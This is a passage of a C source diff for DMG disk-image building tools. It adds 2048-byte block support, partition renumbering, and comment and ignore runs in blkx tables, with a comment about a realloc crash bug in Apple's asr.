hfs/hfscompress.c hfs/xattr.c includes/hfs/hfscompress.h includes/partial/firmwaremaster.h includes/partial/partial.h @@ -232,6 +232,7 @@ size_t memFileWrite(AbstractFile* file, const void* data, size_t len) { } if((info->offset + (size_t)len) > (*(info->bufferSize))) { + memset(((uint8_t*)(*(info->buffer))) + *(info->bufferSize), 0, (info->offset + (size_t)len) - *(info->bufferSize)); *(info->bufferSize) = info->offset + (size_t)len; } common/abstractfile.c @@ -41,7 +41,7 @@ int main(int argc, char* argv[]) { TestByteOrder(); if(argc < 4) { - printf("usage: %s [extract|build|iso|dmg] <in> <out> (-k <key>) (partition)\n", argv[0]); + printf("usage: %s [extract|build|build2048|res|iso|dmg] <in> <out> (-k <key>) (partition)\n", argv[0]); return 0; } @@ -72,7 +72,11 @@ int main(int argc, char* argv[]) { } extractDmg(in, out, partNum); } else if(strcmp(argv[1], "build") == 0) { - buildDmg(in, out); + buildDmg(in, out, SECTOR_SIZE); + } else if(strcmp(argv[1], "build2048") == 0) { + buildDmg(in, out, 2048); + } else if(strcmp(argv[1], "res") == 0) { + outResources(in, out); } else if(strcmp(argv[1], "iso") == 0) { convertToISO(in, out); } else if(strcmp(argv[1], "dmg") == 0) { dmg/dmg.c @@ -85,7 +85,7 @@ uint32_t calculateMasterChecksum(ResourceKey* resources) { return result; } -int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { +int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut, unsigned int BlockSize) { io_func* io; Volume* volume; @@ -127,15 +127,15 @@ int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { printf("Creating and writing DDM and partition map...\n"); fflush(stdout); - DDM = createDriverDescriptorMap((volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE); + DDM = createDriverDescriptorMap((volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, BlockSize); - partitions = createApplePartitionMap((volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, HFSX_VOLUME_TYPE); + partitions = createApplePartitionMap((volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, HFSX_VOLUME_TYPE, BlockSize); - writeDriverDescriptorMap(abstractOut, DDM, &CRCProxy, (void*) (&dataForkToken), &resources); + int pNum = writeDriverDescriptorMap(-1, abstractOut, DDM, BlockSize, &CRCProxy, (void*) (&dataForkToken), &resources); free(DDM); - writeApplePartitionMap(abstractOut, partitions, &CRCProxy, (void*) (&dataForkToken), &resources, &nsiz); + pNum = writeApplePartitionMap(pNum, abstractOut, partitions, BlockSize, &CRCProxy, (void*) (&dataForkToken), &resources, &nsiz); free(partitions); - writeATAPI(abstractOut, &CRCProxy, (void*) (&dataForkToken), &resources, &nsiz); + pNum = writeATAPI(pNum, abstractOut, BlockSize, &CRCProxy, (void*) (&dataForkToken), &resources, &nsiz); memset(&uncompressedToken, 0, sizeof(uncompressedToken)); SHA1Init(&(uncompressedToken.sha1)); @@ -144,15 +144,16 @@ int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { abstractIn->seek(abstractIn, 0); blkx = insertBLKX(abstractOut, abstractIn, USER_OFFSET, (volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, - 2, CHECKSUM_CRC32, &BlockSHA1CRC, &uncompressedToken, &CRCProxy, &dataForkToken, volume); + pNum, CHECKSUM_CRC32, &BlockSHA1CRC, &uncompressedToken, &CRCProxy, &dataForkToken, volume, 1); blkx->checksum.data[0] = uncompressedToken.crc; printf("Inserting main blkx...\n"); fflush(stdout); - - resources = insertData(resources, "blkx", 2, "Mac_OS_X (Apple_HFSX : 3)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); + + char pName[100]; + sprintf(pName, "Mac_OS_X (Apple_HFSX : %d)", pNum + 1); + resources = insertData(resources, "blkx", pNum, pName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); free(blkx); - - + printf("Inserting cSum data...\n"); fflush(stdout); csum.version = 1; @@ -178,13 +179,20 @@ int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { if(nsiz == NULL) { nsiz = myNSiz; } else { - myNSiz->next = nsiz->next; - nsiz->next = myNSiz; + NSizResource* curNsiz = nsiz; + while(curNsiz->next != NULL) + { + curNsiz = curNsiz->next; + } + curNsiz->next = myNSiz; } + pNum++; + printf("Writing free partition...\n"); fflush(stdout); - writeFreePartition(abstractOut, (volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, &resources); + pNum = writeFreePartition(pNum, abstractOut, USER_OFFSET + (volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE, + (FREE_SIZE + (BlockSize / SECTOR_SIZE / 2)) / (BlockSize / SECTOR_SIZE) * (BlockSize / SECTOR_SIZE), &resources); dataForkChecksum = dataForkToken.crc; @@ -192,7 +200,7 @@ int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { curResource = resources; while(curResource->next != NULL) curResource = curResource->next; - + curResource->next = writeNSiz(nsiz); curResource = curResource->next; releaseNSiz(nsiz); @@ -238,7 +246,8 @@ int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut) { printf("Master checksum: %x\n", koly.fUDIFMasterChecksum.data[0]); fflush(stdout); koly.fUDIFImageVariant = kUDIFDeviceImageType; - koly.fUDIFSectorCount = EXTRA_SIZE + (volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE; + koly.fUDIFSectorCount = (volumeHeader->totalBlocks * volumeHeader->blockSize)/SECTOR_SIZE + + ((EXTRA_SIZE + (BlockSize / SECTOR_SIZE / 2)) / (BlockSize / SECTOR_SIZE) * (BlockSize / SECTOR_SIZE)); koly.reserved2 = 0; koly.reserved3 = 0; koly.reserved4 = 0; @@ -307,7 +316,7 @@ int convertToDMG(AbstractFile* abstractIn, AbstractFile* abstractOut) { if(DDM->sbSig == DRIVER_DESCRIPTOR_SIGNATURE) { BlockSize = DDM->sbBlkSize; - writeDriverDescriptorMap(abstractOut, DDM, &CRCProxy, (void*) (&dataForkToken), &resources); + int pNum = writeDriverDescriptorMap(-1, abstractOut, DDM, BlockSize, &CRCProxy, (void*) (&dataForkToken), &resources); free(DDM); printf("Processing partition map...\n"); fflush(stdout); @@ -338,7 +347,7 @@ int convertToDMG(AbstractFile* abstractIn, AbstractFile* abstractOut) { abstractIn->seek(abstractIn, partitions[i].pmPyPartStart * BlockSize); blkx = insertBLKX(abstractOut, abstractIn, partitions[i].pmPyPartStart, partitions[i].pmPartBlkCnt, i, CHECKSUM_CRC32, - &BlockCRC, &uncompressedToken, &CRCProxy, &dataForkToken, NULL); + &BlockCRC, &uncompressedToken, &CRCProxy, &dataForkToken, NULL, 1); blkx->checksum.data[0] = uncompressedToken.crc; resources = insertData(resources, "blkx", i, partitionName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); @@ -379,7 +388,7 @@ int convertToDMG(AbstractFile* abstractIn, AbstractFile* abstractOut) { abstractIn->seek(abstractIn, 0); blkx = insertBLKX(abstractOut, abstractIn, 0, fileLength/SECTOR_SIZE, ENTIRE_DEVICE_DESCRIPTOR, CHECKSUM_CRC32, - &BlockCRC, &uncompressedToken, &CRCProxy, &dataForkToken, NULL); + &BlockCRC, &uncompressedToken, &CRCProxy, &dataForkToken, NULL, 1); resources = insertData(resources, "blkx", 0, "whole disk (unknown partition : 0)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); free(blkx); dmg/dmglib.c @@ -8,9 +8,20 @@ #define SECTORS_AT_A_TIME 0x200 +// Okay, this value sucks. You shouldn't touch it because it affects how many ignore sections get added to the blkx list +// If the blkx list gets too fragmented with ignore sections, then the copy list in certain versions of the iPhone's +// asr becomes too big. Due to Apple's BUGGY CODE, this causes asr to segfault! This is because the copy list becomes +// too large for the initial buffer allocated, and realloc is called by asr. Unfortunately, after the realloc, the initial +// pointer is still used by asr for a little while! Frakking noob mistake. + +// The only reason why it works at all is their really idiotic algorithm to determine where to put ignore blocks. It's +// certainly nothing reasonable like "put in an ignore block if you encounter more than X blank sectors" (like mine) +// There's always a large-ish one at the end, and a tiny 2 sector one at the end too, to take care of the space after +// the backup volume header. No frakking clue how they go about determining how to do that. + BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorNumber, uint32_t numSectors, uint32_t blocksDescriptor, uint32_t checksumType, ChecksumFunc uncompressedChk, void* uncompressedChkToken, ChecksumFunc compressedChk, - void* compressedChkToken, Volume* volume) { + void* compressedChkToken, Volume* volume, int addComment) { BLKXTable* blkx; uint32_t roomForRuns; @@ -23,8 +34,9 @@ BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorN size_t have; int ret; - z_stream strm; - + int IGNORE_THRESHOLD = 100000; + + z_stream strm; blkx = (BLKXTable*) malloc(sizeof(BLKXTable) + (2 * sizeof(BLKXRun))); roomForRuns = 2; @@ -56,6 +68,24 @@ BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorN curRun = 0; curSector = 0; + uint64_t startOff = in->tell(in); + + if(addComment) + { + blkx->runs[curRun].type = BLOCK_COMMENT; + blkx->runs[curRun].reserved = 0x2B626567; + blkx->runs[curRun].sectorStart = curSector; + blkx->runs[curRun].sectorCount = 0; + blkx->runs[curRun].compOffset = out->tell(out) - blkx->dataStart; + blkx->runs[curRun].compLength = 0; + curRun++; + + if(curRun >= roomForRuns) { + roomForRuns <<= 1; + blkx = (BLKXTable*) realloc(blkx, sizeof(BLKXTable) + (roomForRuns * sizeof(BLKXRun))); + } + } + while(numSectors > 0) { if(curRun >= roomForRuns) { roomForRuns <<= 1; @@ -72,11 +102,102 @@ BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorN strm.zfree = Z_NULL; strm.opaque = Z_NULL; + int amountRead; + { + size_t sectorsToSkip = 0; + size_t processed = 0; + + while(processed < numSectors) + { + blkx->runs[curRun].sectorCount = ((numSectors - processed) > SECTORS_AT_A_TIME) ? SECTORS_AT_A_TIME : (numSectors - processed); + + //printf("Currently at %" PRId64 "\n", curOff); + in->seek(in, startOff + (blkx->sectorCount - numSectors + processed) * SECTOR_SIZE); + ASSERT((amountRead = in->read(in, inBuffer, blkx->runs[curRun].sectorCount * SECTOR_SIZE)) == (blkx->runs[curRun].sectorCount * SECTOR_SIZE), "mRead"); + + if(!addComment) + break; + + processed += amountRead / SECTOR_SIZE; + + size_t* checkBuffer = (size_t*) inBuffer; + size_t counter; + size_t counter_max = amountRead / sizeof(size_t); + for(counter = 0; counter < counter_max; counter++) + { + if(checkBuffer[counter] != 0) { + //printf("Not empty at %" PRId64 " / %" PRId64 "\n", (int64_t)(counter * sizeof(size_t)) + curOff, (int64_t)((counter * sizeof(size_t)) / SECTOR_SIZE + sectorsToSkip + blkx->runs[curRun].sectorStart)); + break; + } + } + + size_t skipInBuffer = (counter * sizeof(size_t)) / SECTOR_SIZE; + sectorsToSkip += skipInBuffer; + + //printf("sectorsToSkip: %d\n", sectorsToSkip); + + if(counter < counter_max) + { + if(sectorsToSkip > IGNORE_THRESHOLD) + { + //printf("Seeking back to %" PRId64 "\n", curOff + (skipInBuffer * SECTOR_SIZE)); + //in->seek(in, curOff + (skipInBuffer * SECTOR_SIZE)); + } else { + //printf("Breaking out: %d / %d\n", (size_t) counter, (size_t) counter_max); + } + break; + } + } + + if(sectorsToSkip > IGNORE_THRESHOLD) + { + int remainder = sectorsToSkip & 0xf; + + if(sectorsToSkip != remainder) + { + blkx->runs[curRun].type = BLOCK_IGNORE; + blkx->runs[curRun].reserved = 0; + blkx->runs[curRun].sectorStart = curSector; + blkx->runs[curRun].sectorCount = sectorsToSkip - remainder; + blkx->runs[curRun].compOffset = out->tell(out) - blkx->dataStart; + blkx->runs[curRun].compLength = 0; + + printf("run %d: skipping sectors=%" PRId64 ", left=%d\n", curRun, (int64_t) sectorsToSkip, numSectors); + + curSector += blkx->runs[curRun].sectorCount; + numSectors -= blkx->runs[curRun].sectorCount; + + curRun++; + } + + if(remainder > 0) + { + blkx->runs[curRun].type = BLOCK_IGNORE; + blkx->runs[curRun].reserved = 0; + blkx->runs[curRun].sectorStart = curSector; + blkx->runs[curRun].sectorCount = remainder; + blkx->runs[curRun].compOffset = out->tell(out) - blkx->dataStart; + blkx->runs[curRun].compLength = 0; + + printf("run %d: skipping sectors=%" PRId64 ", left=%d\n", curRun, (int64_t) sectorsToSkip, numSectors); + + curSector += blkx->runs[curRun].sectorCount; + numSectors -= blkx->runs[curRun].sectorCount; + + curRun++; + } + + IGNORE_THRESHOLD = 0; + + continue; + } + } + printf("run %d: sectors=%" PRId64 ", left=%d\n", curRun, blkx->runs[curRun].sectorCount, numSectors); + + ASSERT(deflateInit(&strm, 1) == Z_OK, "deflateInit"); - ASSERT(deflateInit(&strm, Z_DEFAULT_COMPRESSION) == Z_OK, "deflateInit"); - - ASSERT((strm.avail_in = in->read(in, inBuffer, blkx->runs[curRun].sectorCount * SECTOR_SIZE)) == (blkx->runs[curRun].sectorCount * SECTOR_SIZE), "mRead"); + strm.avail_in = amountRead; strm.next_in = inBuffer; if(uncompressedChk) @@ -94,7 +215,7 @@ BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorN } have = bufferSize - strm.avail_out; - if((have / SECTOR_SIZE) > blkx->runs[curRun].sectorCount) { + if((have / SECTOR_SIZE) >= (blkx->runs[curRun].sectorCount - 15)) { blkx->runs[curRun].type = BLOCK_RAW; ASSERT(out->write(out, inBuffer, blkx->runs[curRun].sectorCount * SECTOR_SIZE) == (blkx->runs[curRun].sectorCount * SECTOR_SIZE), "fwrite"); blkx->runs[curRun].compLength += blkx->runs[curRun].sectorCount * SECTOR_SIZE; @@ -122,7 +243,23 @@ BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorN roomForRuns <<= 1; blkx = (BLKXTable*) realloc(blkx, sizeof(BLKXTable) + (roomForRuns * sizeof(BLKXRun))); } - + + if(addComment) + { + blkx->runs[curRun].type = BLOCK_COMMENT; + blkx->runs[curRun].reserved = 0x2B656E64; + blkx->runs[curRun].sectorStart = curSector; + blkx->runs[curRun].sectorCount = 0; + blkx->runs[curRun].compOffset = out->tell(out) - blkx->dataStart; + blkx->runs[curRun].compLength = 0; + curRun++; + + if(curRun >= roomForRuns) { + roomForRuns <<= 1; + blkx = (BLKXTable*) realloc(blkx, sizeof(BLKXTable) + (roomForRuns * sizeof(BLKXRun))); + } + } + blkx->runs[curRun].type = BLOCK_TERMINATOR; blkx->runs[curRun].reserved = 0; blkx->runs[curRun].sectorStart = curSector; dmg/io.c @@ -421,7 +421,7 @@ void flipPartitionMultiple(Partition* partition, char multiple, char out, unsign FLIPENDIAN(partition->pmBootEntry); FLIPENDIAN(partition->pmBootEntry2); FLIPENDIAN(partition->pmBootCksum); - FLIPENDIAN(partition->bootCode); + FLIPENDIANLE(partition->bootCode); if(!multiple) { break; @@ -472,71 +472,87 @@ void readDriverDescriptorMap(AbstractFile* file, ResourceKey* resources) { free(buffer); } -DriverDescriptorRecord* createDriverDescriptorMap(uint32_t numSectors) { +DriverDescriptorRecord* createDriverDescriptorMap(uint32_t numSectors, unsigned int BlockSize) { DriverDescriptorRecord* toReturn; - toReturn = (DriverDescriptorRecord*) malloc(SECTOR_SIZE); - memset(toReturn, 0, SECTOR_SIZE); + toReturn = (DriverDescriptorRecord*) malloc(BlockSize); + memset(toReturn, 0, BlockSize); toReturn->sbSig = DRIVER_DESCRIPTOR_SIGNATURE; - toReturn->sbBlkSize = SECTOR_SIZE; - toReturn->sbBlkCount = numSectors + EXTRA_SIZE; + toReturn->sbBlkSize = BlockSize; + toReturn->sbBlkCount = (numSectors + EXTRA_SIZE + (BlockSize / SECTOR_SIZE / 2)) / (BlockSize / SECTOR_SIZE); toReturn->sbDevType = 0; toReturn->sbDevId = 0; toReturn->sbData = 0; +/* toReturn->sbDrvrCount = 1; - toReturn->ddBlock = ATAPI_OFFSET; + toReturn->ddBlock = (ATAPI_OFFSET * SECTOR_SIZE) / BlockSize; toReturn->ddSize = 0x4; toReturn->ddType = 0x701; +*/ + toReturn->sbDrvrCount = 0; + toReturn->ddBlock = 0; + toReturn->ddSize = 0; + toReturn->ddType = 0; return toReturn; } -void writeDriverDescriptorMap(AbstractFile* file, DriverDescriptorRecord* DDM, ChecksumFunc dataForkChecksum, void* dataForkToken, +int writeDriverDescriptorMap(int pNum, AbstractFile* file, DriverDescriptorRecord* DDM, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources) { AbstractFile* bufferFile; BLKXTable* blkx; ChecksumToken uncompressedToken; DriverDescriptorRecord* buffer; - buffer = (DriverDescriptorRecord*) malloc(DDM_SIZE * SECTOR_SIZE); - memcpy(buffer, DDM, DDM_SIZE * SECTOR_SIZE); + buffer = (DriverDescriptorRecord*) malloc(DDM_SIZE * BlockSize); + memcpy(buffer, DDM, DDM_SIZE * BlockSize); memset(&uncompressedToken, 0, sizeof(uncompressedToken)); flipDriverDescriptorRecord(buffer, TRUE); - bufferFile = createAbstractFileFromMemory((void**)&buffer, DDM_SIZE * SECTOR_SIZE); + bufferFile = createAbstractFileFromMemory((void**)&buffer, DDM_SIZE * BlockSize); blkx = insertBLKX(file, bufferFile, DDM_OFFSET, DDM_SIZE, DDM_DESCRIPTOR, CHECKSUM_CRC32, &CRCProxy, &uncompressedToken, - dataForkChecksum, dataForkToken, NULL); + dataForkChecksum, dataForkToken, NULL, 0); blkx->checksum.data[0] = uncompressedToken.crc; - *resources = insertData(*resources, "blkx", -1, "Driver Descriptor Map (DDM : 0)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); + char pName[100]; + sprintf(pName, "Driver Descriptor Map (DDM : %d)", pNum + 1); + *resources = insertData(*resources, "blkx", pNum, pName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); free(buffer); bufferFile->close(bufferFile); free(blkx); + + pNum++; + + if((DDM_SIZE * BlockSize / SECTOR_SIZE) - DDM_SIZE > 0) + pNum = writeFreePartition(pNum, file, DDM_SIZE, (DDM_SIZE * BlockSize / SECTOR_SIZE) - DDM_SIZE, resources); + + return pNum; } -void writeApplePartitionMap(AbstractFile* file, Partition* partitions, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn) { +int writeApplePartitionMap(int pNum, AbstractFile* file, Partition* partitions, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn) { AbstractFile* bufferFile; BLKXTable* blkx; ChecksumToken uncompressedToken; Partition* buffer; NSizResource* nsiz; CSumResource csum; - - buffer = (Partition*) malloc(PARTITION_SIZE * SECTOR_SIZE); - memcpy(buffer, partitions, PARTITION_SIZE * SECTOR_SIZE); + + size_t realPartitionSize = (PARTITION_SIZE * SECTOR_SIZE) / BlockSize * BlockSize; + buffer = (Partition*) malloc(realPartitionSize); + memcpy(buffer, partitions, realPartitionSize); memset(&uncompressedToken, 0, sizeof(uncompressedToken)); - flipPartition(buffer, TRUE, SECTOR_SIZE); + flipPartition(buffer, TRUE, BlockSize); - bufferFile = createAbstractFileFromMemory((void**)&buffer, PARTITION_SIZE * SECTOR_SIZE); + bufferFile = createAbstractFileFromMemory((void**)&buffer, realPartitionSize); - blkx = insertBLKX(file, bufferFile, PARTITION_OFFSET, PARTITION_SIZE, 0, CHECKSUM_CRC32, - &BlockCRC, &uncompressedToken, dataForkChecksum, dataForkToken, NULL); + blkx = insertBLKX(file, bufferFile, PARTITION_OFFSET * BlockSize / SECTOR_SIZE, realPartitionSize / SECTOR_SIZE, pNum, CHECKSUM_CRC32, + &BlockCRC, &uncompressedToken, dataForkChecksum, dataForkToken, NULL, 0); bufferFile->close(bufferFile); @@ -546,7 +562,9 @@ void writeApplePartitionMap(AbstractFile* file, Partition* partitions, ChecksumF csum.type = CHECKSUM_MKBLOCK; csum.checksum = uncompressedToken.block; - *resources = insertData(*resources, "blkx", 0, "Apple (Apple_partition_map : 1)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); + char pName[100]; + sprintf(pName, "Apple (Apple_partition_map : %d)", pNum + 1); + *resources = insertData(*resources, "blkx", pNum, pName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); *resources = insertData(*resources, "cSum", 0, "", (const char*) (&csum), sizeof(csum), 0); nsiz = (NSizResource*) malloc(sizeof(NSizResource)); @@ -566,9 +584,11 @@ void writeApplePartitionMap(AbstractFile* file, Partition* partitions, ChecksumF free(buffer); free(blkx); + + return pNum + 1; } -void writeATAPI(AbstractFile* file, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn) { +int writeATAPI(int pNum, AbstractFile* file, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn) { AbstractFile* bufferFile; BLKXTable* blkx; ChecksumToken uncompressedToken; @@ -583,8 +603,16 @@ void writeATAPI(AbstractFile* file, ChecksumFunc dataForkChecksum, void* dataFor memcpy(atapi, atapi_data, ATAPI_SIZE * SECTOR_SIZE); bufferFile = createAbstractFileFromMemory((void**)&atapi, ATAPI_SIZE * SECTOR_SIZE); - blkx = insertBLKX(file, bufferFile, ATAPI_OFFSET, ATAPI_SIZE, 1, CHECKSUM_CRC32, - &BlockCRC, &uncompressedToken, dataForkChecksum, dataForkToken, NULL); + if(BlockSize != SECTOR_SIZE) + { + blkx = insertBLKX(file, bufferFile, ATAPI_OFFSET, BlockSize / SECTOR_SIZE, pNum, CHECKSUM_CRC32, + &BlockCRC, &uncompressedToken, dataForkChecksum, dataForkToken, NULL, 0); + } + else + { + blkx = insertBLKX(file, bufferFile, ATAPI_OFFSET, ATAPI_SIZE, pNum, CHECKSUM_CRC32, + &BlockCRC, &uncompressedToken, dataForkChecksum, dataForkToken, NULL, 0); + } bufferFile->close(bufferFile); free(atapi); @@ -595,7 +623,9 @@ void writeATAPI(AbstractFile* file, ChecksumFunc dataForkChecksum, void* dataFor csum.type = CHECKSUM_MKBLOCK; csum.checksum = uncompressedToken.block; - *resources = insertData(*resources, "blkx", 1, "Macintosh (Apple_Driver_ATAPI : 2)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); + char pName[100]; + sprintf(pName, "Macintosh (Apple_Driver_ATAPI : %d)", pNum + 1); + *resources = insertData(*resources, "blkx", pNum, pName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); *resources = insertData(*resources, "cSum", 1, "", (const char*) (&csum), sizeof(csum), 0); nsiz = (NSizResource*) malloc(sizeof(NSizResource)); @@ -614,6 +644,13 @@ void writeATAPI(AbstractFile* file, ChecksumFunc dataForkChecksum, void* dataFor } free(blkx); + + pNum++; + + if(BlockSize != SECTOR_SIZE && (USER_OFFSET - (ATAPI_OFFSET + (BlockSize / SECTOR_SIZE))) > 0) + pNum = writeFreePartition(pNum, file, ATAPI_OFFSET + (BlockSize / SECTOR_SIZE), USER_OFFSET - (ATAPI_OFFSET + (BlockSize / SECTOR_SIZE)), resources); + + return pNum; } @@ -660,11 +697,13 @@ void readApplePartitionMap(AbstractFile* file, ResourceKey* resources, unsigned free(partition); } -Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType) { +Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType, unsigned int BlockSize) { Partition* partition; + Partition* orig; - partition = (Partition*) malloc(SECTOR_SIZE * PARTITION_SIZE); - memset(partition, 0, SECTOR_SIZE * PARTITION_SIZE); + size_t realPartitionSize = (PARTITION_SIZE * SECTOR_SIZE) / BlockSize * BlockSize; + orig = partition = (Partition*) malloc(realPartitionSize); + memset(partition, 0, realPartitionSize); partition[0].pmSig = APPLE_PARTITION_MAP_SIGNATURE; partition[0].pmSigPad = 0; @@ -672,9 +711,9 @@ Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType) strcpy((char*)partition[0].pmPartName, "Apple"); strcpy((char*)partition[0].pmParType, "Apple_partition_map"); partition[0].pmPyPartStart = PARTITION_OFFSET; - partition[0].pmPartBlkCnt = PARTITION_SIZE; + partition[0].pmPartBlkCnt = PARTITION_SIZE / (BlockSize / SECTOR_SIZE); partition[0].pmLgDataStart = 0; - partition[0].pmDataCnt = PARTITION_SIZE; + partition[0].pmDataCnt = partition[0].pmPartBlkCnt; partition[0].pmPartStatus = 0x3; partition[0].pmLgBootStart = 0x0; partition[0].pmBootSize = 0x0; @@ -685,82 +724,92 @@ Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType) partition[0].pmBootCksum = 0x0; partition[0].pmProcessor[0] = '\0'; partition[0].bootCode = 0; + + partition = (Partition*)(((char*) partition) + BlockSize); + partition[0].pmSig = APPLE_PARTITION_MAP_SIGNATURE; + partition[0].pmSigPad = 0; + partition[0].pmMapBlkCnt = 0x4; + strcpy((char*)partition[0].pmPartName, "Macintosh"); + strcpy((char*)partition[0].pmParType, "Apple_Driver_ATAPI"); + partition[0].pmPyPartStart = ATAPI_OFFSET / (BlockSize / SECTOR_SIZE); + if(BlockSize != SECTOR_SIZE) + { + partition[0].pmPartBlkCnt = 1; + } + else + { + partition[0].pmPartBlkCnt = ATAPI_SIZE; + } + partition[0].pmLgDataStart = 0; + partition[0].pmDataCnt = partition[0].pmPartBlkCnt; + partition[0].pmPartStatus = 0x303; + partition[0].pmLgBootStart = 0x0; + partition[0].pmBootSize = 0x800; + partition[0].pmBootAddr = 0x0; + partition[0].pmBootAddr2 = 0x0; + partition[0].pmBootEntry = 0x0; + partition[0].pmBootEntry2 = 0x0; + partition[0].pmBootCksum = 0xffff; + partition[0].pmProcessor[0] = '\0'; + partition[0].bootCode = BOOTCODE_DMMY; + + partition = (Partition*)(((char*) partition) + BlockSize); + partition[0].pmSig = APPLE_PARTITION_MAP_SIGNATURE; + partition[0].pmSigPad = 0; + partition[0].pmMapBlkCnt = 0x4; + strcpy((char*)partition[0].pmPartName, "Mac_OS_X"); + strcpy((char*)partition[0].pmParType, volumeType); + partition[0].pmPyPartStart = USER_OFFSET / (BlockSize / SECTOR_SIZE); + partition[0].pmPartBlkCnt = numSectors / (BlockSize / SECTOR_SIZE); + partition[0].pmLgDataStart = 0; + partition[0].pmDataCnt = partition[0].pmPartBlkCnt; + partition[0].pmPartStatus = 0x40000033; + partition[0].pmLgBootStart = 0x0; + partition[0].pmBootSize = 0x0; + partition[0].pmBootAddr = 0x0; + partition[0].pmBootAddr2 = 0x0; + partition[0].pmBootEntry = 0x0; + partition[0].pmBootEntry2 = 0x0; + partition[0].pmBootCksum = 0x0; + partition[0].pmProcessor[0] = '\0'; + partition[0].bootCode = 0; + + partition = (Partition*)(((char*) partition) + BlockSize); + partition[0].pmSig = APPLE_PARTITION_MAP_SIGNATURE; + partition[0].pmSigPad = 0; + partition[0].pmMapBlkCnt = 0x4; + partition[0].pmPartName[0] = '\0'; + strcpy((char*)partition[0].pmParType, "Apple_Free"); + partition[0].pmPyPartStart = (USER_OFFSET + numSectors) / (BlockSize / SECTOR_SIZE); + partition[0].pmPartBlkCnt = (FREE_SIZE + (BlockSize / SECTOR_SIZE / 2)) / (BlockSize / SECTOR_SIZE); + partition[0].pmLgDataStart = 0; + partition[0].pmDataCnt = 0x0; + partition[0].pmPartStatus = 0x0; + partition[0].pmLgBootStart = 0x0; + partition[0].pmBootSize = 0x0; + partition[0].pmBootAddr = 0x0; + partition[0].pmBootAddr2 = 0x0; + partition[0].pmBootEntry = 0x0; + partition[0].pmBootEntry2 = 0x0; + partition[0].pmBootCksum = 0x0; + partition[0].pmProcessor[0] = '\0'; + partition[0].bootCode = 0; - partition[1].pmSig = APPLE_PARTITION_MAP_SIGNATURE; - partition[1].pmSigPad = 0; - partition[1].pmMapBlkCnt = 0x4; - strcpy((char*)partition[1].pmPartName, "Macintosh"); - strcpy((char*)partition[1].pmParType, "Apple_Driver_ATAPI"); - partition[1].pmPyPartStart = ATAPI_OFFSET; - partition[1].pmPartBlkCnt = ATAPI_SIZE; - partition[1].pmLgDataStart = 0; - partition[1].pmDataCnt = 0x04; - partition[1].pmPartStatus = 0x303; - partition[1].pmLgBootStart = 0x0; - partition[1].pmBootSize = 0x800; - partition[1].pmBootAddr = 0x0; - partition[1].pmBootAddr2 = 0x0; - partition[1].pmBootEntry = 0x0; - partition[1].pmBootEntry2 = 0x0; - partition[1].pmBootCksum = 0xffff; - partition[1].pmProcessor[0] = '\0'; - partition[1].bootCode = BOOTCODE_DMMY; - - partition[2].pmSig = APPLE_PARTITION_MAP_SIGNATURE; - partition[2].pmSigPad = 0; - partition[2].pmMapBlkCnt = 0x4; - strcpy((char*)partition[2].pmPartName, "Mac_OS_X"); - strcpy((char*)partition[2].pmParType, volumeType); - partition[2].pmPyPartStart = USER_OFFSET; - partition[2].pmPartBlkCnt = numSectors; - partition[2].pmLgDataStart = 0; - partition[2].pmDataCnt = numSectors; - partition[2].pmPartStatus = 